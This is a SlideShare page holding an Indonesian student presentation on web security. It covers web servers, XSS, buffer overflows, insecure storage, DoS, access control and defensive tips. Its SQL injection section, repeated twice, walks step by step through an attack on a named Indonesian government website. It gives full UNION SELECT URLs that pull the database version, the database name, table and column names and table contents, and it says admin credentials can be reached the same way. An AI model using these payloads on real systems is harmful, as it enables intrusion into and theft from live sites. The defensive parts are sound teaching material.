SlideShare a Scribd company logo

web-security

Download as PPTX, PDF
R
Rahmat Mukodas

Dokumen tersebut membahas berbagai topik keamanan jaringan dan website, termasuk penjelasan mengenai SQL injection, buffer overflow, dan cara-cara pencegahannya. Selain itu, dibahas pula contoh kasus pemanfaatan celah keamanan pada website pemerintah melalui teknik SQL injection."

Education
1 of 32
KELOMPOK 4 WEB SECURITY RAHMAT MUKODAS :12127525 CHANDRA PRATAMA :12127946 DINAR KUSUMA :18120173 ISMAIL SAPUTRA :18121434
Pengertian web server Web server adalah suatu server yang memberikan service (layanan) kepada klien yang memita informasi berkaitan dengan web. Web Server sendiri terdiri dari dua komponen. Yang pertama adalah computer itu sendiri dan software web server yang di pakainya. Jadi dapat kesimpulan mesin (komputer) apapun bisa saja enjadi web server asalkan software web server tersedia di mesin (komputer)itu. Salah satu software webserver yang tersedia adalah Apache, tapi selain itu masih banyak lagi web server lainnya seperti ISS,Xitami dll.
. Web Server Apache Apache merupakan Aplikasi Web Server yang paling banyak digunakan saat ini, selain dapat berjalan di banyak Operating System seperti Windows, Linux dan lainya, Apache juga bersifat Open Source alias Gratis. Secara default Apache menggunakan Script PHP dan menggunakan MySQL sebagai Data Base nya dan kesemuanya itu dapat di gunakan secara Gratis pula. Kelebihan Web Server Apache . Apache termasuk dalam kategori freeware . Mampu beroperasi pada berbagai paltform sistem operasi . Mudah mengatur konfigurasinya. Kekurangan Web Server Apache * web server Apache tidak memiliki kemampuan mengatur load seperti IIS, sehingga akan terus mem-fork proses baru hingga nilai MaxClients tercapai atau hingga batas yang diizinkan oleh OS. Ini tentunya menguntungkan penyerang karena habisnya RAM akan lebih cepat tercapai *Apache tidak memproses karakter kutip dalam string Referrer dan User-Agent yang dikirimkan oleh Client. Ini berarti Client dapat memformulasi inputnya secara hati hati untuk merusak format baris log akses * Terganggunya proses upload data, yang bisa menyebabkan software salah dalam menerjemahkan ukuran data yang masuk.
WB SERVER IIS IIS atau Internet Information Services atau Internet Information Server adalah sebuah HTTP web server yang digunakan dalam sistem operasi server Windows, mulai dari Windows NT 4.0 Server, Windows 2000 Server atau Windows Server 2003. Layanan ini merupakan layanan terintegrasi dalam Windows 2000 Server, Windows Server 2003 atau sebagai add-on dalam Windows NT 4.0. Layanan ini berfungsi sebagai pendukung protokol TCP/IP yang berjalan dalam lapisan aplikasi (application layer). IIS juga menjadi fondasi dari platform Internet dan Intranet Microsoft, yang mencakup Microsoft Site Server. Kelebihan IIS 1. Lebih kompatibel dengan Windows karena memang IIS adalah keluaran Microsoft 2. Untuk platform .NET, user hanya bisa menggunakan IIS 3. IIS memiliki fitur URL Filtering untuk mem-filter website yang tidak diinginkan 4. Untuk platform .NET, user hanya bisa menggunakan IIS Kekurangan IIS 1. Tidak gratis (web server berbayar) 2. Port 80 (Port untuk layanan web) sangat mudah diserang oleh cracker 3. Keamanan file log juga sangat mudah ditembus sehingga system password pun akan mudah didapatkan.
Pengertian web browser Web Browser adalah suatu program atau software yang digunakan untuk menjelajahi internet atau untuk mencari informasi dari suatu web yang tersimpan didalam komputer. Awalnya, web browser berorientasi pada teks dan belum dapat menampilkan gambar. Namun, web browser sekarang tidak hanya menampilkan gambar dan teks saja, tetapi juga memutar file multimedia seperti video dan suara. Web browser juga dapat mengirim dan menerima email, mengelola HTML, sebagai input dan menjadikan halaman web sebagai hasil output yang informative. Dengan menggunakan web browser, para pengguna internet dapat mengakses berbagai informasi yang terdapat di internet dengan mudah. Beberapa contoh web browser diantaranya Internet Explorer, Mozilla, Firefox, Safari, Opera, dll. Hal yang perlu diketahui dalam pencarian suatu informasi adalah pemahaman tentang struktur Fungsi Web Browser : Fungsi Web Browser adalah untuk menampilkan dan melakukan interaksi dengan dukumen-dokumen yang disediakan oleh web server.
Contoh Web Browser : - Mozilla Firefox – link, yaitu dibuat oleh mozilla corporation, firefox adalah salah satu web browser open source yang dibangun dengan Gecko layout engine. Tak hanya handal firefox juga didukung oleh sejumlah Add-ons yang dapat diinstall terpisah yang memungkinkan pengguna melakukan sesuai dengan kegunaan Add-ons tersebut. - Internet Exporer – link, yaitu Web browser besutan Microsoft Corporation biasanya dikenal dengan nama pendek IE, sejak 1995 IE mulai di masukan sebagai default sotware pada saat instalasi Sistem Operasi Windows, sejak tulisan ini dibuat IE belum lama ini meluncurkan versi IE8. - Safari – link, yaitu Dibuat oleh Apple Inc, perusahaan yang juga memproduksi komputer Macintosh, iPod, dan juga iPhone. dibangun dengan browser engine WebKit, WebKit juga adalah browser engine pertama yang lulus test Acid3. - Flock – link, yaitu Flock adalah web browser yang dibangun dengan code mozilla frefox yang web browser ini khususkan menyediakan social networking dan Web 2.0. Flock didesain untuk memudahkan aktivitas online pengguna internet mengatur beberapa social networking, web mail, news feeds dan blogs yang mereka miliki. Dengan Mengunakan Flock mereka dapat dengan mudah menjelajah, berbagi, dan menikmati content maupun menjalin hubungan di situs pertemanan yang mereka inginkan. - Opera – link, yaitu Opera dikembangkan oleh Opera Software company adalah salah satu Web Browser dan juga Internet Suite. Jika firefox punya Add-ons, Opera punya “Opera Widgets”, sebuah aplikasi web kecil yang dijalankan bersamaan dengan Opera yang mempunyai kegunaan tertentu, layaknya Add-ons firefox.
unvalidated input -cross site scripting XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script codelainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya. Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet. - buffer overlows Buffer Overflow merupakan salah satu penyebab yang paling banyak menimbulkan masalah pada keamanan komputer baik yang bersifat lokal maupun jaringan. Serangan Buffer overflow terjadi ketika si Attacker memberikan input yang berlebihan pada program yang di jalankan, sehingga program mengalami kelebihan muatan dan memory tidak dapat mengalokasikannya. Ini memberikan kesempatan kepada Attacker untuk menindih data pada program dan men-takeover control program yang dieksekusi attacker.
Dengan tersedianya program-program eksploitasi di Internet, baik dalam bentuk source code maupun binary seringkali menjadi menjadi alat untuk membuka celah keamanan sehingga membuat orang tertarik untuk melakukan eksperimen yang sporadis tanpa memperdulikan akibat yang dapat ditimbulkannya. Banyak orang yang mengklaim dirinya sebagai seorang cracker jika sudah berhasil mengekspoitasi komputer orang lain, tanpa memahami cara kerja eksploitasi tersebut sesungguhnya. Buffer overflow merupakan hasil dari dari kelemahan bahasa pemrograman c, c++, fortran, dan assembly, yang tidak secara otomatis melakukan pengecekan batas input ketika program dieksekusi. Sebagai akibat dari Buffer overflow dapat menyebatkan crash pada program, atau mempersilahkan si Attacker untuk mengeksekusi perintah atau koding jahatnya untuk menguasai sistem target, seperti tujuan mengambil alih akun root menggunakan metode Buffer overflow. Dan penyebab terjadinya buffer overflow, Pada banyak kasus, eksploitasi buffer overflow digunakan untuk melakukan penyerangan terhadap aplikasi tertentu dan bahkan pada system operasi tertentu. Pada dasarnya, setiap kali program membaca atau meng-copy data kedalam buffer, ia akan mengecek dahulu apakah ada cukup space/ ruang untuk melakukan copy. Suatu perkecualian adalah jika dapat menunjukkan hal itu tidak dapat terjadi, tetapi kebanyakan program akan berubah setiap saat yang dapat membuat yang tak mungkin menjadi mungkin. Biasanya, pada pemrograman yang menggunakan C/C++ lah yang banyak terjadi kasus kasus buffer overflow,
Overwriting Function’s Return Addresses Seperti yang kita tahu, sangat mudah untuk melakukan overwriting function’s return addresses, attacker menggunakan teknik buffer overflow untuk mendapatkan akses root. Attacker mencoba mengesekusi buffer buffer overflowwing area, menimpa nilai dari return address yang mengisi nilai ke buffer dan mengesekusi kode jahatnya. Sebagai kode yang bisa dimasukkan ke dalam program menggunakan environment variabel atau program input parameters. Sebagai contoh coding yang bisa mendapatkan shell akun root pada paper yang ditulis oleh aleph One untu Phrack Magazine di http://destory.net/machines/security/p49-14-aleph-one Tindakan Untuk Mencegah Buffer Overflow Tidak satupum metode yang dijelaskan di bawah yang benar-benar bisa mencegah kemungkinan serangan, namanyajuga manusia tempatnya salah dan lupa. Tetapi metode dibawah ini, dapat meminimalisir dari kegiatan buffer overflow yang mengakibatkan kerusakan stack.
1. Menulis kode yang aman : Buffer overflow adalah hasil dari input yang berlebihan ke dalam buffer. C library seperti strcpy (), stcat (), sprintf () dan vsprintf beroperasi pada null terminated strings dan tidak mengecek batasan input. Gets () juga fungsi lainnya yang memasukkan input ke dalam buffer dari stdin. Pada scanf () juga bisa mengakibat buffer overflows. 2. Stack execute invalidation: karena koding jahat (contoh, instruksi assembly untuk mengambil alih root shell) merupakan input rgument ke dalam program, ini tersimpan ke dalam stack dan bukan dalam code segment. Oleh karena itu solusi mudahnya adalah tidak memperboleh adalah tidak memperbolehkan stack mengesekusi intruksi apapun. Kode apapun yang dieksekusi dengan kode lainnya di dalam stack dapat mengakibatkan segmentation violation. 3. Compiler tools : Beberapa tahun terakhir, compiler mempunyai kemampuan lebih. Beberapa compiler di lengkapi peringatan dalam menggunakan kostruk yang tidak aman seperti gets (), strpy () dan sejenisnya sebagai contoh: Int main (){ Char*str = (char*) malloc (10);// mengalokasikan 10 bytes untuk str Gets (str);// membaca input dari stdin dan disimpan ke str } Setelah di compiler tool mempunyai fitur untuk bounds checking, jadi meng generate kode yang built-in tanpa mengubah struktur kode yang dapat menghindarkan penggunaan ilegal address tidak diperbolehkan untuk eksekusi. Gunakanlah patch GCC untuk mendapatkan fitur mendapatkan fitur bounds checking, dapat anda temui dihttp://web.inter.nl.net/hcc/Haj.Ten.Brugge patch ini juga mencegah tindakan penimpaan return adress, seperti yang banyak terjadi. Dan juga gunakan tools stackshield di http://www.angelfire.com/sk/stackshield/index.html .
injection flaws Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut.
SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id Gambar 1. Halaman utama website Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql dengan memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter angka, misalnya : http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga didapat error page seperti gambar di bawah ini. Error SQL ini merupakan salah satu kelemahan dalam membangun struktur basis data dalam mendefinisikan type data.
Gambar 2.error page Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan table-table dalam databse tersebut yang digunakan sebagai basis data website ini. Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2 by n`pada akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n tersebut, sehingga error page berubah menjadi ‘unknown coloum’
Gambar 3. error unkown coloum Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi mysql dan username administrator database, yaitu dengan memasukkan sintak `and 1=2 union select version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
Gambar 4. diketahui versi mysql Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah dengan mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url berikut ini: http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+database(),2--&Itemid=2 Gambar 5. diketahui nama database Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database tersebut, adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name) from information_schema.tables where table_schema=database ()- `pad akhir alamat url, menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_ schema=database()--&Itemid=2 maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
Gambar 6. nama table-table pada database Terlihat nama table-table pada database ini adalah agenda batas_orangjam, buku_alamat, dimanam direktori, direktori_url, disposisi_surat, fasilitas, file,tb, forum, grup, grup_pengguna, hasil_jajak,_pendapat, ing_core_acl_aro, ing_core_acl_aro_groups, ing_core_acl_aro_sections, ing_core_acl_group_aro_map,ing_core_log_items,ing_core_log_sear Setelah mengetahui struktur tabel pada database ini, akan mudah untuk mengetahui nama kolom- kolom pada tabel-tabel tersebut adalah dengan memasukkan sintak : `and 1=2 union select group_concat (table_name) from information_schema.tables where table_name=mysqlchar(table_name)-,bagaimana mendapatkan nilai mysqchar adalah dengan mengkonversi nama tabel menjadi bantuan sql pada localhost kita, nama tabel agenda dikonversi menjadichar (97,103,101,110,100,97). Sehingga alamat url menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281%20and%201=0%20union%20select%20group_concat(column_name),2%20from%20informati on_schema.columns%20where%20table_name=CHAR(97,103,101,110,100,97)--&Itemid=2 Dan didapat nama kolom pada tabel agenda seperti pada gambar
Injection Flows Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id
Gambar 1. Halaman utama website Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql dengan memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter angka, misalnya : http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga didapat error page seperti gambar di bawah ini. Error SQL ini merupakan salah satu kelemahan dalam membangun struktur basis data dalam mendefinisikan type data.
Gambar 2.error page Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan table-table dalam databse tersebut yang digunakan sebagai basis data website ini. Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2 by n`pada akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n tersebut, sehingga error page berubah menjadi ‘unknown coloum’
Gambar 3. error unkown coloum Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi mysql dan username administrator database, yaitu dengan memasukkan sintak `and 1=2 union select version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
Gambar 4. diketahui versi mysql Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah dengan mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url berikut ini: http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+database(),2--&Itemid=2
Gambar 5. diketahui nama database Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database tersebut, adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name) from information_schema.tables where table_schema=database ()- `pad akhir alamat url, menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+w here+table_schema=database()--&Itemid=2 maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
Gambar 7. nama kolom pada tabel agenda maka diketahui, nama kolom pada tabel agenda adalah kode_agenda pemilik, judul, tipe, tgl_mulai, waktu_mulai, waktu_selesai, kode_pengulangan, kode_undangan, deskripsi, tgl_dibuat, tgl_diubah, sharing_publik, sifat_sharing, undang_via_email, undang_via_sms. Terakhir untuk mengetahui isi dari kolom-kolom tersebut adalah dengan memasukkan sintak `and 1=2 union select group_concat(nama_kolom0x3a,nama_kolom lainnya) from nama_table- Sehingga url menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(kode_agenda,0x3a,pemilik,0x3a,judul,0x3a,tipe,0x3a,tg l_mulai,0x3a,waktu_mulai,0x3a,waktu_selesai,0x3a,kode_pengulangan,0x3a,kode_undangan,0x3a ,deskripsi,0x3a,tgl_dibuat,0x3a,tgl_diubah,0x3a,sharing_publik,0x3a,sifat_sharing,0x3a,undang_via _email,0x3a,undang_via_sms),2+from+agenda--&Itemid=2
Gambar 8. isi kolom pada tabel agenda Maka selanjutnya sql injection inid apat dimanfaatkan oleh orang yang tidak bertanggung jawab untuk mengetahui nama username dan administrasi untuk login sebagai administrator website ini.
VII Insecure storage Aplikasi web biasanya perlu menyimpan informasi yang sensitif seperti password, informasi kartu kredit, dan yang lain. Dikarenakan item-item tersebut bersifat sensitif item-item tersebut perlu dienkripsi untuk menghindari pengaksesan secara langsung. Akan tetapi beberapa metode enkrips lemah dan masih bisa diserang. Berikut ini beberapa kesalahan yang sering terjadi : •Kesalahan untuk mengenkripsi data penting. • Tidak amannya kunci, certificate, dan password • Kurang amannya tempat penyimpanan data • Kurangnya perhitungan dari rekomendasi • Kesalahan pemilihan algoritma • Mencoba untuk menciptakan algoritma enkripsi yang baru. Berdasarkan skenario berikut ini : Terdapat sebuah aplikasi, dimana terdapat password pada user object. Akan tetapi, aplikasi menyimpan user objek ke dalam session setelah user login. Permasalahan yang akan muncul pada skenario ini adalah password dapat dilihat oleh seseorang yang dapat melihat session user tersebut. Salah satu cara yang dilakukan untuk menghindari kesalahan penyimpanan informasi yang sensitif adalah : tidak membuat password sebagai atribut dari kelas yang mewakili informasi user; Daripada mengenkripsi nomor kartu kredit dari user, akan lebih baik untuk menanyakannya setiap kali dibutuhkan. Selain itu, menggunakan algoritma enkripsi yang sudah ada akan lebih baik daripada membuat algoritma sendiri. Anda cukup memastikan algoritma yang akan digunakan telah diakui oleh public dan benar-benar dapat dilaksanakan.
VIII Deniel of Service Deniel of Service merupakan serangan yang dibuat oleh hacker yang mengirimkan request dalam jumlah yang sangat besar dan dalam waktu yang bersamaan. Dikarenakan request-request tersebut, server menjadi kelebihan beban dan tidak bisa melayani user lainnya. Serangan DoS mampu menghabiskan bandwidth yang ada pada server. Selain itu dapat juga menghabiskan memory, koneksi database, dan sumber yang lain. Pada umumnya sangat sulit umtuk melindungi apliksi dari serangan ini. Akan tetapi masih ada cara yang dapat dilakukan seperti membatasi resource yang dapat di akses user dalam jumlah yang minimal. Merupakan ide/cara yang bagus untuk membuat load quota yang membatasi jumlah load data yang akan diakses user dari sistem. Salah satu contoh adalah pada implementasi bulletin board : adanya pembatasan user pada ssaat melakukan search, dimana operasi ini hanya dapat dilakukan setiap 20 detik. Dengan cara ini dapat dipastikan bahwa user tiadk bisa menghasbiakan koneksi dari database. Solusi yang lain adalah mendesain aplikasi web dimana user yang belum terotorisasi hanya memiliki akses yang sedikit atau tidak memilki akses ke content web yang berhunbungan dengan databse. IX Insecure Configuration Management Biasanya kelompok (group) yang mengembangkan aplikasi berbeda dengan kelompok yang mengatur hosting dari aplikasi. Hal ini bisa menjadi berbahaya, dikarenakan keamanan yang diandalkan hanya dari segi aplikasi : sedangkan dari segi server juga memiliki aspek keamanan yang perlu diperhatian, Adanya kesalahan dari konfigurasi server dapat melewati aspek keamanan dari segi aplikasi. Berikut ini adalah kesalahan konfigurasi server yang bisa menimbulkan masalah :
II Broken Access Control Banyak aplikasi yang mengkategorikan user-usernya ke dalam role yang berbeda dan level yang berbeda untuk berinteraksi dengan content yang dibedakan dari kategori-kategori tersebut, salah satu contohnya, banyak aplikasi yang terdapat user role dan admin role: hanya admin role yang dijinkan untuk mengakses halaman khusus atau melakukan action melakukan action administration. Masalahnya adalah beberapa aplikasi tidak efektif untuk memaksa agar otomatis ini bekerja contohnya, beberapa program hanya menggunakan sebuah chekpoint dimana hanya user yang terpilih yang dapat mengakses: untuk proses lebih lanjut, user harus membuktikan dirinya menjalankan pengecekan dari chek point sebelumnya: dimana apabila user berhasil melewati halaman login, mereka dapat bebas menjalankan operasi. Masalah lain yang berhubungan dengan access control adalah : a. Insecure Ids (Id Tidak aman) – beberapa site menggunakan id atau kunci yang menunjukan kepada user atau fungsi. ID dapat juga ditebak, dan jika hacker dapat mudah menebak ID dari user yang terautorisasi, maka site akan mudah diserang. b. File permissions- kebanyakan web dan aplikasi server percaya kepada external file yang menyimpan daftar dari user yang terotorisasi dan resources mana saja yang dapat dan/atau tidak dapat di akses. Apabila file ini dapat di baca dari luar, maka hacker dapat memodifikasi dengan mudah untuk menambahkan dirinya pada daftar user yang diijinkan. Langkah –langkah apa saja yang dapat di lakukan untuk mengatasinya? Pada contoh-contoh tadi, kita dapat mengembangkan filter atau komponen yang dapat di jalankan pada sensitive resources, filter atau komponen tadi dapat menjamin hanya user yang terotorisasi dapat mengakses. Untuk melindungi dari inseure Ids yang dapat memberi acess control, pada masalah file permission, file- file tersebut harus berada pada lokasi yang tidak dapat di akses oleh web browser dan hanya role tertentu saja yang dapat mengaksesnya.
Cara Mengatasi Ancaman Hacker Dan Cracker Ada banyak jenis software untuk mengatasi ancaman dari Hacker, salah satunya adalah Zona Alarm. Zone Alarm di design untuk melindungi komputer PC, Laptop maupun Netbook dari ancamana hacker di internet. . Software ini memiliki 4 fungsi keamanan yaitu: •Firewal; Firewall pada zone alarm berfungsi untuk mengendalikan akses masukke komputer anda dan meminta izin untuk mengakses situs/web yang ingin anda kunjungi dengan demikian anda memiliki kesempatan untuk cek web tersebut layak atau tidak dibuka, biasanya situs/web yang mengandung pornografi, content dewasa, dllSelain itu juga anda dapat mengatur tingkat keamanan internet zona security dan trusted zona security. •Aplication Control; Aplication Control berfungsi untuk mengontrol program-program yang beroperasi membutuhkan akses internet seperti: Internet Explorer, Mozilla, FTP, dll. Nah dengan bantuan fitur ini tentu mengurangi resiko terhadap serangan/ancaman langsung dari hacker yang sedang online. •Anti Virus Monitoring; Antivirus Monitoring berfungsi untuk memonitor status dari ancaman virus yang masuk ke komputer anda baik online maupun offline. • Email Protection; Dari namanya tentu anda tahu fungsinya?, benar fungsi dari Email Protection adalah melindungi email dari ancaman virus, malware, dll.
Mengatasi Sarangan Hacker Pada Website • Login ke cpanel, pastikan ’Last Login From’ tercantum IP publik anda Langkah pertama adalah mengecek pada bagian “Last login from” melalui panel kontrol anda. Pastikan harus selalu tercantum alamat IP publik dari mana terakhir kali anda melakukan login. Bagaimana cara menemukan IP publik kita? Cara termudah adalah dengan membuka situs domain checker semacam http://who.is. Biasanya tepat pada portalnya akan muncul tulisan Your IP is 183.7.xxx.xxx. Itulah alamat IP publik anda.Kembali lagi jika pada “Last login from” tercantum alamat IP lain yang tidak anda ketahui, catat. Hal ini berbahaya sebab logikanya jika alamat IP lain bisa login ke kontrol panel kita, berarti mereka memiliki username, password, dan semua akses ke situs kita. Dan inilah indikasi awal bahwa website kita mendapat serangan. • Menyalakan fitur Log ArchivingWebsite akses log menyimpan rekaman mendetail tentang siapa yang melakukan koneksi ke situs kita, baik melalui HTTP (pengunjung normal) maupun melalui FTP (transfer file). Umumnya, log tersebut dihapus setiap harinya. Padahal peranan akses log sangatlah penting. Agar akses log tidak terhapus, lakukan langkah berikut : Login ke cpanel > Raw Log Manager, Cek pada kotak “Archive Logs”, Uncek pada kotak “Remove the previous month’s archived logs”, Klik Save •Langkah darurat; segera offline kan website anda Jika halaman anda terinfeksi virus yang memiliki kemungkinan virus tersebut bisa menyerang pengunjung situs anda, maka segera lindungi pengunjung anda dan juga reputasi anda. Yaitu dengan membuat website anda berstatus offline. Bisa dengan menambahkan beberapa baris kode pada .htaccess, maupun mengupload tampilan halaman under construction. Jika anda melakukannya dengan segera, anda memiliki kemungkinan untuk menghindarkan situs anda mendapat predikat “This site may harm your computer” dari Google. Selain itu, penyerang biasanya telah menginstal backdoor script pada halaman index anda yang memungkinkan mereka untuk kembali ke server anda. Menetapkan status offline pada situs anda sementara, sedikitnya memiliki kemungkinan untuk mengunci dan membuat penyerang tidak bisa masuk melalui backdoor yang telah diinstal.
•Semua administrators situs melakukan scan pada PC masing-masin Fakta bahwa di tahun 2009, penyebab nomor satu dari hacking website adalah PC webmaster yang terinfeksi oleh malware. Malware semacam gumblar, dan martuz (yang telah kita bahas pada edisi sebelumnya, red.) Bertindak sebagai jembatan dalam mencuri informasi login FTP dan mengirimkannya ke komputer remote. Komputer remote inilah yang kemudian menyuntik halaman website korban dengan javascript atau iframes tersembunyi yang mengarahkan pengunjung website korban ke website berbahaya yang menyimpan gumblar dan martuz lainnya. Untuk menghindarinya, pastikan setiap orang yang memiliki akses password ke website anda melakukan setidaknya dua kali scan antivirus dan antispyware pada local komputer masing-masing dengan scanner yang bervariasi. Karena selama PC webmaster terinfeksi, mengubah password situs tidak akan berpengaruh sama sekali. Bukankah password baru dengan mudah dapat dicuri lagi? •Ganti semua password anda Setelah PC administrator bebas dari virus dan spyware, gantilah semua password yang berhubungan dengan situs anda. Panel kontrol, FTP, koneksi database, email akun, dan halaman administrator anda. Pergunakan kombinasi password yang kuat Yaitu password yang tidak mudah ditembus karena mengandung kombinasi kata, angka, dan karakter yang rumit. •Upgrade semua third party script ke versi terbaru Serangan semacam Remote File Inclusion (RFI) memanfaatkan vulnerability pada script versi lama dari script third party kita untuk menyusup ke dalam situs kita. Dan satu-satunya cara untuk menangkal serangan RFI ini adalah menggunakan versi terbaru dari script third party yang telah memiliki kekebalan terhadap RFI. Baik plugin, addon website hingga Content Management System (CMS) anda, segera upgrade ke versi terbaru. Jika anda menggunakan CMS semacam Joomla maupun wordpress, anda bisa mengikuti perkembangan rilis terbaru melalui situs resmi masing-masing CMS yang anda pakai. Update versi wordpress bisa dicek melalui wordpress.org, Joomla pada joomla.org, dan sebagainya. Cek juga situs secunia.com, sebuah situs yang berisi laporan sekuriti setiap third party script. Halaman situs secunia.com mendaftar kerentanan yang ditemukan pada plugin atau addon. Dengan mengecek di halaman tersebut, anda mengetahui apakah third party script yang anda pergunakan aman atau terdapat vulnerability di dalamnya.
Beberapa Tips Membuat Password Anti Hacker • Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password facebook. Ini berarti • seseorang yang dapat menjebol password facebook Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password facebook lebih mudah daripada menjebol email Yahoo. Admin atau “orang dalam” facebook tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda. • Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker. •Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs facebook untuk alasan apapun (misalnya import address book). •Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau facebook.com buka facecrut.com atau yang lain. •Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.
Sumber Referensi : http://id.wikipedia.org/wiki/XSS http://wswaa126a23.blogspot.com/p/blog-page_21.html http://www.patartambunan.com/pengertian-web-browser-dan-jenis-jenis- browser/ http://prediss.com/blog/it-tutorial/buffer-overflow-keamanan-komputer http://www.drn.go.id/index.php?option=isi&task=view&id http://....go.id http://www.angelfire.com/sk/stackshield/index.html

Recommended

Presentasi web security
Presentasi web securityPresentasi web security
Presentasi web security
inyonoel
 
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
Gusti_Ketut_Suardika
 
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
Afifah Luthfiah
 
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
Mislia lia
 
Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
